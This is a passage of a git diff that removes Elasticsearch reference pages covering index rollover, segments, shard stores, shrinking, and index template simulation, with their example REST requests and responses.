-{ - "aliases": { - "logs_write": {} - } -} - -POST /logs_write/_rollover -{ - "conditions" : { - "max_age": "7d", - "max_docs": 1000, - "max_size": "5gb" - }, - "settings": { - "index.number_of_shards": 2 - } -} --------------------------------------------------- - - -[[rollover-index-specify-index-ex]] -===== Specify a target index name - -If the rollover target is an index alias and the name of the existing index ends -with `-` and a number -- e.g. `logs-000001` -- then the name of the new index -will follow the same pattern, incrementing the number (`logs-000002`). The -number is zero-padded with a length of 6, regardless of the old index name. - -If the old name doesn't match this pattern then you must specify the name for -the new index as follows: - -[source,console] --------------------------------------------------- -POST /my_alias/_rollover/my_new_index_name -{ - "conditions": { - "max_age": "7d", - "max_docs": 1000, - "max_size": "5gb" - } -} --------------------------------------------------- -// TEST[s/^/PUT my_old_index_name\nPUT my_old_index_name\/_alias\/my_alias\n/] - - -[[_using_date_math_with_the_rollover_api]] -===== Use date math with a rollover - -If the rollover target is an index alias, it can be useful to use -<> to name the rollover index according to the -date that the index rolled over, e.g. `logstash-2016.02.03`. The rollover API -supports date math, but requires the index name to end with a dash followed by -a number, e.g. `logstash-2016.02.03-1` which is incremented every time the -index is rolled over. 
For instance: - -[source,console] --------------------------------------------------- -# PUT / with URI encoding: -PUT /%3Clogs_%7Bnow%2Fd%7D-1%3E <1> -{ - "aliases": { - "logs_write": {} - } -} - -PUT logs_write/_doc/1 -{ - "message": "a dummy log" -} - -POST logs_write/_refresh - -# Wait for a day to pass - -POST /logs_write/_rollover <2> -{ - "conditions": { - "max_docs": "1" - } -} --------------------------------------------------- -// TEST[s/now/2016.10.31%7C%7C/] - -<1> Creates an index named with today's date (e.g.) `logs_2016.10.31-1` -<2> Rolls over to a new index with today's date, e.g. `logs_2016.10.31-000002` if run immediately, or `logs-2016.11.01-000002` if run after 24 hours - -////////////////////////// - -[source,console] --------------------------------------------------- -GET _alias --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - "logs_2016.10.31-000002": { - "aliases": { - "logs_write": {} - } - }, - "logs_2016.10.31-1": { - "aliases": {} - } -} --------------------------------------------------- - -////////////////////////// - -These indices can then be referenced as described in the -<>. For example, to search -over indices created in the last three days, you could do the following: - -[source,console] --------------------------------------------------- -# GET /,,/_search -GET /%3Clogs-%7Bnow%2Fd%7D-*%3E%2C%3Clogs-%7Bnow%2Fd-1d%7D-*%3E%2C%3Clogs-%7Bnow%2Fd-2d%7D-*%3E/_search --------------------------------------------------- -// TEST[continued] -// TEST[s/now/2016.10.31%7C%7C/] - - -[[rollover-index-api-dry-run-ex]] -===== Dry run - -The rollover API supports `dry_run` mode, where request conditions can be -checked without performing the actual rollover. - -[source,console] --------------------------------------------------- -POST /logs_write/_rollover?dry_run -{ - "conditions" : { - "max_age": "7d", - "max_docs": 1000, - "max_size": "5gb" - } -} --------------------------------------------------- -// TEST[s/^/PUT logs-000001\nPUT logs-000001\/_alias\/logs_write\n/] - - -[[indices-rollover-is-write-index]] -===== Roll over a write index - -If the rollover target is an index alias for a write index that has `is_write_index` explicitly set to `true`, it is not -swapped during rollover actions. Since having an alias point to multiple indices is ambiguous in distinguishing -which is the correct write index to roll over, it is not valid to rollover an alias that points to multiple indices. -For this reason, the default behavior is to swap which index is being pointed to by the write-oriented alias. This -was `logs_write` in some of the above examples. Since setting `is_write_index` enables an alias to point to multiple indices -while also being explicit as to which is the write index that rollover should target, removing the alias from the rolled over -index is not necessary. This simplifies things by allowing for one alias to behave both as the write and read aliases for -indices that are being managed with Rollover. - -Look at the behavior of the aliases in the following example where `is_write_index` is set on the rolled over index. 
- -[source,console] --------------------------------------------------- -PUT my_logs_index-000001 -{ - "aliases": { - "logs": { "is_write_index": true } <1> - } -} - -PUT logs/_doc/1 -{ - "message": "a dummy log" -} - -POST logs/_refresh - -POST /logs/_rollover -{ - "conditions": { - "max_docs": "1" - } -} - -PUT logs/_doc/2 <2> -{ - "message": "a newer log" -} --------------------------------------------------- - -<1> configures `my_logs_index` as the write index for the `logs` alias -<2> newly indexed documents against the `logs` alias will write to the new index - -[source,console-result] --------------------------------------------------- -{ - "_index" : "my_logs_index-000002", - "_type" : "_doc", - "_id" : "2", - "_version" : 1, - "result" : "created", - "_shards" : { - "total" : 2, - "successful" : 1, - "failed" : 0 - }, - "_seq_no" : 0, - "_primary_term" : 1 -} --------------------------------------------------- - -////////////////////////// -[source,console] --------------------------------------------------- -GET my_logs_index-000001,my_logs_index-000002/_alias --------------------------------------------------- -// TEST[continued] -////////////////////////// - -After the rollover, the alias metadata for the two indices will have the `is_write_index` setting -reflect each index's role, with the newly created index as the write index. - -[source,console-result] --------------------------------------------------- -{ - "my_logs_index-000002": { - "aliases": { - "logs": { "is_write_index": true } - } - }, - "my_logs_index-000001": { - "aliases": { - "logs": { "is_write_index" : false } - } - } -} --------------------------------------------------- diff --git a/docs/reference/indices/segments.asciidoc b/docs/reference/indices/segments.asciidoc deleted file mode 100644 index 89bcce73322..00000000000 --- a/docs/reference/indices/segments.asciidoc +++ /dev/null @@ -1,226 +0,0 @@ -[[indices-segments]] -=== Index segments API -++++ -Index segments -++++ - -Returns low-level information about the https://lucene.apache.org/core/[Lucene] -segments in index shards. For data streams, the API returns information about -the stream's backing indices. - -[source,console] ----- -GET /my-index-000001/_segments ----- -// TEST[setup:my_index] - - -[[index-segments-api-request]] -==== {api-request-title} - -`GET //_segments` - -`GET /_segments` - - -[[index-segments-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - - -[[index-segments-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -`verbose`:: -experimental:[] -(Optional, Boolean) -If `true`, the response includes detailed information -about Lucene's memory usage. -Defaults to `false`. 
- - -[[index-segments-api-response-body]] -==== {api-response-body-title} - -``:: -(String) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=segment] - -`generation`:: -(Integer) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=generation] - -`num_docs`:: -(Integer) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=docs-count] - -`deleted_docs`:: -(Integer) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=docs-deleted] - -`size_in_bytes`:: -(Integer) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=segment-size] - -`memory_in_bytes`:: -(Integer) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=memory] - -`committed`:: -(Boolean) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=committed] - -`search`:: -(Boolean) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=segment-search] - -`version`:: -(String) -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=segment-version] - -`compound`:: -(Boolean) -If `true`, Lucene merged all files from the segment -into a single file to save file descriptors. - -`attributes`:: -(Object) -Contains information about whether high compression was enabled. - - -[[index-segments-api-example]] -==== {api-examples-title} - - -===== Get segment information for a specific data stream or index - -[source,console] --------------------------------------------------- -GET /test/_segments --------------------------------------------------- -// TEST[s/^/PUT test\n{"settings":{"number_of_shards":1, "number_of_replicas": 0}}\nPOST test\/test\?refresh\n{"test": "test"}\n/] - - -===== Get segment information for several data streams and indices - -[source,console] --------------------------------------------------- -GET /test1,test2/_segments --------------------------------------------------- -// TEST[s/^/PUT test1\nPUT test2\n/] - - -===== Get segment information for all data streams and indices in a cluster - -[source,console] --------------------------------------------------- -GET /_segments --------------------------------------------------- -// TEST[s/^/PUT test\n{"settings":{"number_of_shards":1, "number_of_replicas": 0}}\nPOST test\/test\?refresh\n{"test": "test"}\n/] - -The API returns the following response: - -[source,console-response] --------------------------------------------------- -{ - "_shards": ... - "indices": { - "test": { - "shards": { - "0": [ - { - "routing": { - "state": "STARTED", - "primary": true, - "node": "zDC_RorJQCao9xf9pg3Fvw" - }, - "num_committed_segments": 0, - "num_search_segments": 1, - "segments": { - "_0": { - "generation": 0, - "num_docs": 1, - "deleted_docs": 0, - "size_in_bytes": 3800, - "memory_in_bytes": 1410, - "committed": false, - "search": true, - "version": "7.0.0", - "compound": true, - "attributes": { - } - } - } - } - ] - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": $body._shards,/] -// TESTRESPONSE[s/"node": "zDC_RorJQCao9xf9pg3Fvw"/"node": $body.$_path/] -// TESTRESPONSE[s/"attributes": \{[^}]*\}/"attributes": $body.$_path/] -// TESTRESPONSE[s/: (\-)?[0-9]+/: $body.$_path/] -// TESTRESPONSE[s/7\.0\.0/$body.$_path/] - - -===== Verbose mode - -To add additional information that can be used for debugging, -use the `verbose` flag. 
- -experimental::[] - -[source,console] --------------------------------------------------- -GET /test/_segments?verbose=true --------------------------------------------------- -// TEST[continued] - -The API returns the following response: - -[source,console-response] --------------------------------------------------- -{ - ... - "_0": { - ... - "ram_tree": [ - { - "description": "postings [PerFieldPostings(format=1)]", - "size_in_bytes": 2696, - "children": [ - { - "description": "format 'Lucene50_0' ...", - "size_in_bytes": 2608, - "children" :[ ... ] - }, - ... - ] - }, - ... - ] - - } - ... -} --------------------------------------------------- -// TESTRESPONSE[skip:Response is too verbose to be fully shown in documentation, so we just show the relevant bit and don't test the response.] diff --git a/docs/reference/indices/shard-stores.asciidoc b/docs/reference/indices/shard-stores.asciidoc deleted file mode 100644 index c82cd1e0705..00000000000 --- a/docs/reference/indices/shard-stores.asciidoc +++ /dev/null @@ -1,187 +0,0 @@ -[[indices-shards-stores]] -=== Index shard stores API -++++ -Index shard stores -++++ - -Retrieves store information -about replica shards in one or more indices. -For data streams, the API retrieves store -information for the stream's backing indices. - -[source,console] ----- -GET /my-index-000001/_shard_stores ----- -// TEST[setup:my_index] - - -[[index-shard-stores-api-request]] -==== {api-request-title} - -`GET //_shard_stores` - -`GET /_shard_stores` - - -[[index-shard-stores-api-desc]] -==== {api-description-title} - -The index shard stores API returns the following information: - -* The node on which each replica shard exists -* Allocation ID for each replica shard -* Unique ID for each replica shard -* Any errors encountered - while opening the shard index - or from an earlier failure - -By default, the API only returns store information -for primary shards that are unassigned -or have one or more unassigned replica shards. - - -[[index-shard-stores-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard expressions (`*`) are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - - -[[index-shard-stores-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -`status`:: -+ --- -(Optional, string) -Comma-separated list of shard health statuses -used to limit the request. - -Valid values include: - -`green`:: -The primary shard and all replica shards are assigned. - -`yellow`:: -One or more replica shards are unassigned. - -`red`:: -The primary shard is unassigned. - -`all`:: -Return all shards, -regardless of health status. - -Defaults to `yellow,red`. 
--- - -[[index-shard-stores-api-example]] -==== {api-examples-title} - - -[[index-shard-stores-api-single-ex]] -===== Get shard store information for a specific data stream or index - -[source,console] ----- -GET /test/_shard_stores ----- -// TEST[s/^/PUT test\n/] - - -[[index-shard-stores-api-multi-ex]] -===== Get shard store information for several data streams and indices - -[source,console] ----- -GET /test1,test2/_shard_stores ----- -// TEST[s/^/PUT test1\nPUT test2\n/] - - -[[index-shard-stores-api-all-ex]] -===== Get shard store information for all data streams and indices - -[source,console] ----- -GET /_shard_stores ----- -// TEST[continued] - - -[[index-shard-stores-api-health-ex]] -===== Get shard store information based on cluster health - -You can use the `status` query parameter -to limit returned information based on shard health. - -The following request only returns information -for assigned primary and replica shards. - -[source,console] --------------------------------------------------- -GET /_shard_stores?status=green --------------------------------------------------- -// TEST[setup:node] -// TEST[s/^/PUT my-index-00001\n{"settings":{"number_of_shards":1, "number_of_replicas": 0}}\nPOST my-index-00001\/test\?refresh\n{"test": "test"}\n/] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "indices": { - "my-index-00001": { - "shards": { - "0": { <1> - "stores": [ <2> - { - "sPa3OgxLSYGvQ4oPs-Tajw": { <3> - "name": "node_t0", - "ephemeral_id": "9NlXRFGCT1m8tkvYCMK-8A", - "transport_address": "local[1]", - "attributes": {} - }, - "allocation_id": "2iNySv_OQVePRX-yaRH_lQ", <4> - "allocation": "primary|replica|unused" <5> - "store_exception": ... <6> - } - ] - } - } - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"store_exception": \.\.\.//] -// TESTRESPONSE[s/"sPa3OgxLSYGvQ4oPs-Tajw"/\$node_name/] -// TESTRESPONSE[s/: "[^"]*"/: $body.$_path/] -// TESTRESPONSE[s/"attributes": \{[^}]*\}/"attributes": $body.$_path/] - - - -<1> The key is the corresponding shard id for the store information -<2> A list of store information for all copies of the shard -<3> The node information that hosts a copy of the store, the key - is the unique node id. -<4> The allocation id of the store copy -<5> The status of the store copy, whether it is used as a - primary, replica or not used at all -<6> Any exception encountered while opening the shard index or - from earlier engine failure diff --git a/docs/reference/indices/shrink-index.asciidoc b/docs/reference/indices/shrink-index.asciidoc deleted file mode 100644 index 5a32a3f1987..00000000000 --- a/docs/reference/indices/shrink-index.asciidoc +++ /dev/null @@ -1,229 +0,0 @@ -[[indices-shrink-index]] -=== Shrink index API -++++ -Shrink index -++++ - -Shrinks an existing index into a new index with fewer primary shards. - - -[source,console] ----- -POST /my-index-000001/_shrink/shrunk-my-index-000001 ----- -// TEST[s/^/PUT my-index-000001\n{"settings":{"index.number_of_shards":2,"blocks.write":true}}\n/] - - -[[shrink-index-api-request]] -==== {api-request-title} - -`POST //_shrink/` - -`PUT //_shrink/` - - -[[shrink-index-api-prereqs]] -==== {api-prereq-title} - -Before you can shrink an index: - -* The index must be read-only. -* All primary shards for the index must reside on the same node. -* The index must have a `green` <>. - -To make shard allocation easier, we recommend you also remove the index's -replica shards. 
You can later re-add replica shards as part of the shrink -operation. - -You can use the following <> -request to remove an index's replica shards, relocates the index's remaining -shards to the same node, and make the index read-only. - -[source,console] --------------------------------------------------- -PUT /my_source_index/_settings -{ - "settings": { - "index.number_of_replicas": 0, <1> - "index.routing.allocation.require._name": "shrink_node_name", <2> - "index.blocks.write": true <3> - } -} --------------------------------------------------- -// TEST[s/^/PUT my_source_index\n{"settings":{"index.number_of_shards":2}}\n/] - -<1> Removes replica shards for the index. -<2> Relocates the index's shards to the `shrink_node_name` node. - See <>. -<3> Prevents write operations to this index. Metadata changes, such as deleting - the index, are still allowed. - - -It can take a while to relocate the source index. Progress can be tracked -with the <>, or the <> can be used to wait until all shards have relocated -with the `wait_for_no_relocating_shards` parameter. - - -[[shrink-index-api-desc]] -==== {api-description-title} - -The shrink index API allows you to shrink an existing index into a new index -with fewer primary shards. The requested number of primary shards in the target index -must be a factor of the number of shards in the source index. For example an index with -`8` primary shards can be shrunk into `4`, `2` or `1` primary shards or an index -with `15` primary shards can be shrunk into `5`, `3` or `1`. If the number -of shards in the index is a prime number it can only be shrunk into a single -primary shard. Before shrinking, a (primary or replica) copy of every shard -in the index must be present on the same node. - -The current write index on a data stream cannot be shrunk. In order to shrink -the current write index, the data stream must first be -<> so that a new write index is created -and then the previous write index can be shrunk. - -[[how-shrink-works]] -===== How shrinking works - -A shrink operation: - -. Creates a new target index with the same definition as the source - index, but with a smaller number of primary shards. - -. Hard-links segments from the source index into the target index. (If - the file system doesn't support hard-linking, then all segments are copied - into the new index, which is a much more time consuming process. Also if using - multiple data paths, shards on different data paths require a full copy of - segment files if they are not on the same disk since hardlinks don’t work across - disks) - -. Recovers the target index as though it were a closed index which - had just been re-opened. - - -[[_shrinking_an_index]] -===== Shrink an index - -To shrink `my_source_index` into a new index called `my_target_index`, issue -the following request: - -[source,console] --------------------------------------------------- -POST /my_source_index/_shrink/my_target_index -{ - "settings": { - "index.routing.allocation.require._name": null, <1> - "index.blocks.write": null <2> - } -} --------------------------------------------------- -// TEST[continued] - -<1> Clear the allocation requirement copied from the source index. -<2> Clear the index write block copied from the source index. - -The above request returns immediately once the target index has been added to -the cluster state -- it doesn't wait for the shrink operation to start. 
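-
-If you need to block until the target index is usable, one option is to poll the cluster health
-API, as the monitoring section below describes. A minimal sketch, reusing the `my_target_index`
-name from the example above:
-
-[source,console]
---------------------------------------------------
-GET /_cluster/health/my_target_index?wait_for_status=yellow&timeout=30s
---------------------------------------------------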
-
-[IMPORTANT]
-=====================================
-
-Indices can only be shrunk if they satisfy the following requirements:
-
-* The target index must not exist.
-
-* The source index must have more primary shards than the target index.
-
-* The number of primary shards in the target index must be a factor of the
-  number of primary shards in the source index.
-
-* The index must not contain more than `2,147,483,519` documents in total
-  across all shards that will be shrunk into a single shard on the target index
-  as this is the maximum number of docs that can fit into a single shard.
-
-* The node handling the shrink process must have sufficient free disk space to
-  accommodate a second copy of the existing index.
-
-=====================================
-
-The `_shrink` API is similar to the <>
-and accepts `settings` and `aliases` parameters for the target index:
-
-[source,console]
---------------------------------------------------
-POST /my_source_index/_shrink/my_target_index
-{
-  "settings": {
-    "index.number_of_replicas": 1,
-    "index.number_of_shards": 1, <1>
-    "index.codec": "best_compression" <2>
-  },
-  "aliases": {
-    "my_search_indices": {}
-  }
-}
---------------------------------------------------
-// TEST[s/^/PUT my_source_index\n{"settings": {"index.number_of_shards":5,"index.blocks.write": true}}\n/]
-
-<1> The number of shards in the target index. This must be a factor of the
-    number of shards in the source index.
-<2> Best compression will only take effect when new writes are made to the
-    index, such as when <> the shard to a single
-    segment.
-
-
-NOTE: Mappings may not be specified in the `_shrink` request.
-
-
-[[monitor-shrink]]
-===== Monitor the shrink process
-
-The shrink process can be monitored with the <>, or the <> can be used to wait
-until all primary shards have been allocated by setting the `wait_for_status`
-parameter to `yellow`.
-
-The `_shrink` API returns as soon as the target index has been added to the
-cluster state, before any shards have been allocated. At this point, all
-shards are in the state `unassigned`. If, for any reason, the target index
-can't be allocated on the shrink node, its primary shard will remain
-`unassigned` until it can be allocated on that node.
-
-Once the primary shard is allocated, it moves to state `initializing`, and the
-shrink process begins. When the shrink operation completes, the shard will
-become `active`. At that point, Elasticsearch will try to allocate any
-replicas and may decide to relocate the primary shard to another node.
-
-
-[[shrink-wait-active-shards]]
-===== Wait for active shards
-
-Because the shrink operation creates a new index to shrink the shards to,
-the <> setting
-on index creation applies to the shrink index action as well.
-
-
-[[shrink-index-api-path-params]]
-==== {api-path-parms-title}
-
-``::
-(Required, string)
-Name of the source index to shrink.
- -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=target-index] - -[[shrink-index-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=wait_for_active_shards] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - - -[[shrink-index-api-request-body]] -==== {api-request-body-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=target-index-aliases] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=target-index-settings] diff --git a/docs/reference/indices/simulate-index.asciidoc b/docs/reference/indices/simulate-index.asciidoc deleted file mode 100644 index 2d09117be40..00000000000 --- a/docs/reference/indices/simulate-index.asciidoc +++ /dev/null @@ -1,176 +0,0 @@ -[[indices-simulate-index]] -=== Simulate index API -++++ -Simulate index -++++ - -experimental[] - -Returns the index configuration that would be applied to the specified index from an -existing <>. - -//// -[source,console] --------------------------------------------------- -PUT _index_template/template_1 -{ - "index_patterns": ["my-index-*"], - "template": { - "settings": { - "number_of_shards": 1 - } - } -} --------------------------------------------------- -// TESTSETUP - -[source,console] --------------------------------------------------- -DELETE _index_template/* --------------------------------------------------- -// TEARDOWN -//// - -[source,console] --------------------------------------------------- -POST /_index_template/_simulate_index/my-index-000001 --------------------------------------------------- - -[[simulate-index-api-request]] -==== {api-request-title} - -`POST /_index_template/_simulate_index/` - - -[[simulate-index-api-path-params]] -==== {api-path-parms-title} - -``:: -(Required, string) -Name of the index to simulate. - -[[simulate-index-api-query-params]] -==== {api-query-parms-title} -//// -`cause`:: -(Optional, string) The reason for running the simulation. -//// - -include::{es-ref-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -[role="child_attributes"] -[[simulate-index-api-response-body]] -==== {api-response-body-title} - -`overlapping`:: -(array) Any templates that also matched the index but were superseded by a higher-priority template. -Response includes an empty array if there are no overlapping templates. -+ -.Properties of `overlapping` -[%collapsible%open] -==== -`name`:: -(string) Name of the superseded template. - -`index_patterns`:: -(array) Index patterns that the superseded template applies to. -==== - -`template`:: -(object) -The settings, mappings, and aliases that would be applied to the index. -+ -.Properties of `template` -[%collapsible%open] -==== -include::{es-ref-dir}/rest-api/common-parms.asciidoc[tag=aliases] -+ -Response includes an empty object if no aliases would be applied. - -include::{es-ref-dir}/rest-api/common-parms.asciidoc[tag=mappings] -+ -Omitted from the response if no mappings would be applied. - -include::{es-ref-dir}/rest-api/common-parms.asciidoc[tag=settings] -+ -Response includes an empty object if no settings would be applied. -==== - -[[simulate-index-api-example]] -==== {api-examples-title} - -The following example shows the configuration that would be applied to `my-index-000001` by -an existing template. 
- -[source,console] --------------------------------------------------- -PUT /_component_template/ct1 <1> -{ - "template": { - "settings": { - "index.number_of_shards": 2 - } - } -} - -PUT /_component_template/ct2 <2> -{ - "template": { - "settings": { - "index.number_of_replicas": 0 - }, - "mappings": { - "properties": { - "@timestamp": { - "type": "date" - } - } - } - } -} - -PUT /_index_template/final-template <3> -{ - "index_patterns": ["my-index-*"], - "composed_of": ["ct1", "ct2"], - "priority": 5 -} - -POST /_index_template/_simulate_index/my-index-000001 <4> --------------------------------------------------- -<1> Create a component template (`ct1`) that sets the number of shards to 2 -<2> Create a second component template (`ct2`) that sets the number of replicas to 0 and defines a mapping -<3> Create an index template (`final-template`) that uses the component templates -<4> Show the configuration that would be applied to `my-index-000001` - -The response shows the index settings, mappings, and aliases applied by the `final-template`: - -[source,console-result] ---------------------------------------------------------- -{ - "template" : { - "settings" : { - "index" : { - "number_of_shards" : "2", - "number_of_replicas" : "0" - } - }, - "mappings" : { - "properties" : { - "@timestamp" : { - "type" : "date" - } - } - }, - "aliases" : { } - }, - "overlapping" : [ - { - "name" : "template_1", - "index_patterns" : [ - "my-index-*" - ] - } - ] -} ---------------------------------------------------------- diff --git a/docs/reference/indices/simulate-multi-component-templates.asciidoc b/docs/reference/indices/simulate-multi-component-templates.asciidoc deleted file mode 100644 index e3371634caa..00000000000 --- a/docs/reference/indices/simulate-multi-component-templates.asciidoc +++ /dev/null @@ -1,124 +0,0 @@ -[[simulate-multi-component-templates]] -== Simulate multi-component templates - -Since templates can be composed not only of multiple component templates, but also the index -template itself, there are two simulation APIs to determine what the resulting index settings will -be. - -To simulate the settings that would be applied to a particular index name: - -//// -[source,console] --------------------------------------------------- -PUT /_index_template/template_1 -{ - "index_patterns" : ["my*"], - "priority" : 1, - "template": { - "settings" : { - "number_of_shards" : 2 - } - } -} --------------------------------------------------- -// TESTSETUP - -[source,console] --------------------------------------------------- -DELETE /_index_template/template_1 --------------------------------------------------- -// TEARDOWN - -//// - -[source,console] --------------------------------------------------- -POST /_index_template/_simulate_index/my-index-000001 --------------------------------------------------- - -To simulate the settings that would be applied from an existing template: - -[source,console] --------------------------------------------------- -POST /_index_template/_simulate/template_1 --------------------------------------------------- - -You can also specify a template definition in the simulate request. -This enables you to verify that settings will be applied as expected before you add a new template. 
- -[source,console] --------------------------------------------------- -PUT /_component_template/ct1 -{ - "template": { - "settings": { - "index.number_of_shards": 2 - } - } -} - -PUT /_component_template/ct2 -{ - "template": { - "settings": { - "index.number_of_replicas": 0 - }, - "mappings": { - "properties": { - "@timestamp": { - "type": "date" - } - } - } - } -} - -POST /_index_template/_simulate -{ - "index_patterns": ["my*"], - "template": { - "settings" : { - "index.number_of_shards" : 3 - } - }, - "composed_of": ["ct1", "ct2"] -} --------------------------------------------------- - - -The response shows the settings, mappings, and aliases that would be applied to matching indices, -and any overlapping templates whose configuration would be superseded by the simulated template body -or higher-priority templates. - -[source,console-result] ---------------------------------------------------------- -{ - "template" : { - "settings" : { - "index" : { - "number_of_shards" : "3", <1> - "number_of_replicas" : "0" - } - }, - "mappings" : { - "properties" : { - "@timestamp" : { - "type" : "date" <2> - } - } - }, - "aliases" : { } - }, - "overlapping" : [ - { - "name" : "template_1", <3> - "index_patterns" : [ - "my*" - ] - } - ] -} ---------------------------------------------------------- -<1> The number of shards from the simulated template body -<2> The `@timestamp` field inherited from the `ct2` component template -<3> Any overlapping templates that would have matched, but have lower priority diff --git a/docs/reference/indices/simulate-template.asciidoc b/docs/reference/indices/simulate-template.asciidoc deleted file mode 100644 index 860df49c139..00000000000 --- a/docs/reference/indices/simulate-template.asciidoc +++ /dev/null @@ -1,300 +0,0 @@ -[[indices-simulate-template]] -=== Simulate index template API -++++ -Simulate template -++++ - -experimental[] - -Returns the index configuration that would be applied by a particular -<>. - -//// -[source,console] --------------------------------------------------- -PUT _index_template/template_1 -{ - "index_patterns": ["te*", "bar*"], - "template": { - "settings": { - "number_of_shards": 1 - }, - "mappings": { - "_source": { - "enabled": false - }, - "properties": { - "host_name": { - "type": "keyword" - }, - "created_at": { - "type": "date", - "format": "EEE MMM dd HH:mm:ss Z yyyy" - } - } - }, - "aliases": { - "mydata": { } - } - }, - "priority": 10, - "version": 3, - "_meta": { - "description": "my custom" - } -} --------------------------------------------------- -// TESTSETUP - -[source,console] --------------------------------------------------- -DELETE _index_template/* -DELETE _component_template/* --------------------------------------------------- -// TEARDOWN -//// - -[source,console] --------------------------------------------------- -POST /_index_template/_simulate/template_1 --------------------------------------------------- - -[[simulate-template-api-request]] -==== {api-request-title} - -`POST /_index_template/_simulate/` - - -[[simulate-template-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Name of the index template to simulate. -To test a template configuration before you add it to the cluster, -omit this parameter and specify the template configuration in the request body. - -[[simulate-template-api-query-params]] -==== {api-query-parms-title} -//// -`cause`:: -(Optional, string) The reason for using the specified template for the simulation. 
-//// - -`create`:: -(Optional, Boolean) If `true`, the template passed in the body is -only used if no existing templates match the same index patterns. -If `false`, the simulation uses the template with the highest priority. -Note that the template is not permanently added or updated in either case; -it is only used for the simulation. -Defaults to `false`. - -include::{es-ref-dir}/rest-api/common-parms.asciidoc[tag=master-timeout] - -[[simulate-template-api-request-body]] -==== {api-request-body-title} - -`composed_of`:: -(Optional, array of strings) -Ordered list of component template names. Component templates are merged in the order -specified, meaning that the last component template specified has the highest precedence. -For an example, see -<>. - -`index_patterns`:: -(Required, array of strings) -Array of wildcard (`*`) expressions -used to match the names of indices during creation. - -`priority`:: -(Optional, integer) -Priority that determines what template is applied if there are multiple templates -that match the name of a new index. -The highest priority template takes precedence. Defaults to `0` (lowest priority). - -`template`:: -(Optional, object) -Template to apply. -+ -.Properties of `template` -[%collapsible%open] -==== -include::{es-ref-dir}/rest-api/common-parms.asciidoc[tag=aliases] - -include::{es-ref-dir}/rest-api/common-parms.asciidoc[tag=mappings] - -include::{es-ref-dir}/rest-api/common-parms.asciidoc[tag=settings] -==== - -`version`:: -(Optional, integer) -Version number used to manage index templates externally. -This version is not automatically generated by {es}. - -`_meta`:: -(Optional, object) -User-specified metadata for the index template. -This information is not generated or used by {es}. - -[role="child_attributes"] -[[simulate-template-api-response-body]] -==== {api-response-body-title} - -`overlapping`:: -(array) Any templates that were superseded by the specified template. -+ -.Properties of `overlapping` -[%collapsible%open] -==== -`index_patterns`:: -(array) Index patterns that the superseded template applies to. - -`name`:: -(string) Name of the superseded template. -==== - -`template`:: -(object) -The settings, mappings, and aliases that would be applied to matching indices. 
-+ -.Properties of `template` -[%collapsible%open] -==== -include::{es-ref-dir}/rest-api/common-parms.asciidoc[tag=aliases] - -include::{es-ref-dir}/rest-api/common-parms.asciidoc[tag=mappings] - -include::{es-ref-dir}/rest-api/common-parms.asciidoc[tag=settings] -==== - -[[simulate-template-api-example]] -==== {api-examples-title} - -[[simulate-existing-template-ex]] -===== Simulating an existing template - -The following example creates and simulates a composed template: - -[source,console] --------------------------------------------------- -PUT /_component_template/ct1 <1> -{ - "template": { - "settings": { - "index.number_of_shards": 2 - } - } -} - -PUT /_component_template/ct2 <2> -{ - "template": { - "settings": { - "index.number_of_replicas": 0 - }, - "mappings": { - "properties": { - "@timestamp": { - "type": "date" - } - } - } - } -} - -PUT /_index_template/final-template <3> -{ - "index_patterns": ["my-index-*"], - "composed_of": ["ct1", "ct2"], - "priority": 5 -} - -POST /_index_template/_simulate/final-template <4> --------------------------------------------------- -<1> Create a component template (`ct1`) that sets the number of shards to 2 -<2> Create a component template (`ct2`) that sets the number of replicas to 0 and defines a mapping -<3> Create an index template (`final-template`) that uses the component templates -<4> Show the configuration applied by the `final-template` - -The response shows the index settings, mappings, and aliases applied by the `final-template`: - -[source,console-result] ---------------------------------------------------------- -{ - "template" : { - "settings" : { - "index" : { - "number_of_shards" : "2", <1> - "number_of_replicas" : "0" <2> - } - }, - "mappings" : { <3> - "properties" : { - "@timestamp" : { - "type" : "date" - } - } - }, - "aliases" : { } - }, - "overlapping" : [ ] -} ---------------------------------------------------------- -<1> Number of shards from `ct1` -<2> Number of replicas from `ct2` -<3> Mappings from `ct1` - - -[[simulate-template-config-ex]] -===== Simulating an arbitrary template configuration - -To see what settings 